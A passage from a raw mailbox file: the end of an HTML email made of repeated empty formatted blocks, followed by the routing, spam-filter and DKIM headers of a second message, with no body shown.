moji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot;,EmojiSymbols; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" dir=3D"=
ltr">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"></s=
pan>&nbsp;</div>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: Calibri,Helvetica,sans-serif,Em=
ojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;,NotoColorE=
moji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot;,EmojiSymbols; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" dir=3D"=
ltr">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"></s=
pan>&nbsp;</div>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: Calibri,Helvetica,sans-serif,Em=
ojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;,NotoColorE=
moji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot;,EmojiSymbols; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" dir=3D"=
ltr">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"></s=
pan>&nbsp;</div>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: Calibri,Helvetica,sans-serif,Em=
ojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;,NotoColorE=
moji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot;,EmojiSymbols; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" dir=3D"=
ltr">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"></s=
pan>&nbsp;</div>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: Calibri,Helvetica,sans-serif,Em=
ojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;,NotoColorE=
moji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot;,EmojiSymbols; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" dir=3D"=
ltr">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"></s=
pan>&nbsp;</div>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: Calibri,Helvetica,sans-serif,Em=
ojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;,NotoColorE=
moji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot;,EmojiSymbols; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" dir=3D"=
ltr">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"></s=
pan>&nbsp;</div>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: Calibri,Helvetica,sans-serif,Em=
ojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;,NotoColorE=
moji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot;,EmojiSymbols; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" dir=3D"=
ltr">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"></s=
pan>&nbsp;</div>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: Calibri,Helvetica,sans-serif,Em=
ojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;,NotoColorE=
moji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot;,EmojiSymbols; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" dir=3D"=
ltr">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"></s=
pan>&nbsp;</div>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: Calibri,Helvetica,sans-serif,Em=
ojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;,NotoColorE=
moji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot;,EmojiSymbols; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" dir=3D"=
ltr">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"></s=
pan>&nbsp;</div>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: Calibri,Helvetica,sans-serif,Em=
ojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;,NotoColorE=
moji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot;,EmojiSymbols; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" dir=3D"=
ltr">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"></s=
pan>&nbsp;</div>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: Calibri,Helvetica,sans-serif,Em=
ojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;,NotoColorE=
moji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot;,EmojiSymbols; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" dir=3D"=
ltr">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"></s=
pan>&nbsp;</div>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: Calibri,Helvetica,sans-serif,Em=
ojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;,NotoColorE=
moji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot;,EmojiSymbols; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" dir=3D"=
ltr">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"></s=
pan>&nbsp;</div>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: Calibri,Helvetica,sans-serif,Em=
ojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;,NotoColorE=
moji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot;,EmojiSymbols; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" dir=3D"=
ltr">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"></s=
pan>&nbsp;</div>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: Calibri,Helvetica,sans-serif,Em=
ojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;,NotoColorE=
moji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot;,EmojiSymbols; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" dir=3D"=
ltr">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"></s=
pan>&nbsp;</div>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: Calibri,Helvetica,sans-serif,Em=
ojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;,NotoColorE=
moji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot;,EmojiSymbols; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" dir=3D"=
ltr">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"></s=
pan>&nbsp;</div>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: Calibri,Helvetica,sans-serif,Em=
ojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;,NotoColorE=
moji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot;,EmojiSymbols; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" dir=3D"=
ltr">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"></s=
pan>&nbsp;</div>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: Calibri,Helvetica,sans-serif,Em=
ojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;,NotoColorE=
moji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot;,EmojiSymbols; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" dir=3D"=
ltr">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"></s=
pan>&nbsp;</div>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: Calibri,Helvetica,sans-serif,Em=
ojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;,NotoColorE=
moji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot;,EmojiSymbols; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" dir=3D"=
ltr">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"></s=
pan>&nbsp;</div>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: Calibri,Helvetica,sans-serif,Em=
ojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;,NotoColorE=
moji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot;,EmojiSymbols; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" dir=3D"=
ltr">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"></s=
pan>&nbsp;</div>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: Calibri,Helvetica,sans-serif,Em=
ojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;,NotoColorE=
moji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot;,EmojiSymbols; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" dir=3D"=
ltr">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"></s=
pan>&nbsp;</div>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: Calibri,Helvetica,sans-serif,Em=
ojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;,NotoColorE=
moji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot;,EmojiSymbols; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" dir=3D"=
ltr">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"></s=
pan>&nbsp;</div>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: Calibri,Helvetica,sans-serif,Em=
ojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;,NotoColorE=
moji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot;,EmojiSymbols; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" dir=3D"=
ltr">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"></s=
pan>&nbsp;</div>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: Calibri,Helvetica,sans-serif,Em=
ojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;,NotoColorE=
moji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot;,EmojiSymbols; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" dir=3D"=
ltr">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"></s=
pan>&nbsp;</div>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: Calibri,Helvetica,sans-serif,Em=
ojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;,NotoColorE=
moji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot;,EmojiSymbols; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" dir=3D"=
ltr">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"></s=
pan>&nbsp;</div>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: Calibri,Helvetica,sans-serif,Em=
ojiFont,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;,NotoColorE=
moji,&quot;Segoe UI Symbol&quot;,&quot;Android Emoji&quot;,EmojiSymbols; WH=
ITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 40=
0; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPA=
CING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" dir=3D"=
ltr">
<span style=3D"FONT-SIZE: small; FONT-FAMILY: Arial; COLOR: rgb(0,0,0)"></s=
pan>&nbsp;</div>
</div>
</div>
</div>
</body>
</html>

--_000_99916FBC9AD6D14A9C555AFB6275AC26201FC547EXCHANGE1distri_--

From jose@monkey.org Thu Jun 14 06:26:22 2018 +0000
Return-Path: email@domain.com
Delivered-To: jose@monkey.org
X-FDA: 74274180204.29.crack31_54b4e2b806307
X-Spam-Summary: 75,0,0,df3ef1f357c4a519,d41d8cd98f00b204,email@domain.com,:,RULES_HIT:41:72:355:375:379:495:800:962:966:967:969:973:983:988:989:1189:1208:1224:1260:1311:1313:1314:1345:1381:1431:1433:1434:1436:1437:1513:1515:1516:1517:1521:1535:1544:1568:1571:1588:1589:1593:1594:1711:1714:1730:1747:1777:1792:2196:2198:2199:2200:2393:2525:2527:2560:2563:2682:2685:2693:2828:2859:2890:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3503:3504:3865:3866:3867:3868:3872:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4117:4321:4385:4552:5007:6261:6653:6669:6674:6678:7652:8518:8583:8603:8957:9025:10004:10489:11473:11658:11914:12043:12438:12555:12740:12895:12955:12986:13139:13374:13439:13546:13551:13848:14096:14181:14721:14828:18000:21080:21433:21450:21451:21483:21524:21554:21627:21716:21797:30001:30022:30054,0,RBL:45.65.144.226-irl.urbl.hostedemail.com-127.0.0.175,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fn,MSBL:0,DNSBL:n
X-HE-Tag: crack31_54b4e2b806307
X-Filterd-Recvd-Size: 6403
Received: from srv01.stampcyberlan.com.br (ns1.stampcyberlan.com.br [45.65.144.226])
	by imf27.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Thu, 14 Jun 2018 06:26:21 +0000 (UTC)
DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed; d=domain.com; s=stampcyberlan;
	h=Content-Transfer-Encoding:Content-Type:MIME-Version:Message-ID:Date:Subject:To:From; bh=CHx6kyTC0njNd3hp7TBY08QlXgxkbfkCeSSykl8cJcw=;
	b=fzkSiCCmBV3Mm2HBHIy27sxN4FyVCkairWgsHhZLVCpm7Cd+fAfaBDDksnp/pdg0yI4AeX7jL6xPJCsp71zCxCsQNgjefugS2y8kd/JVSxQsFPXOu3fL2acjyVB35kFe2nRrd1c3NWdzMGXd2vdi/C8qNiqGrp2F+l57aefL24U=;
Received: from [185.29.8.52] (helo=domain.com)
	by srv01.stampcyberlan.com.br with esmtpa (Exim 4.84_2)
	(envelope-from <email@domain.com>)
	id 1fTKlv-0004I9-5R
	for jose@monkey.org; Thu, 14 Jun 2018 02:26:11 -0300
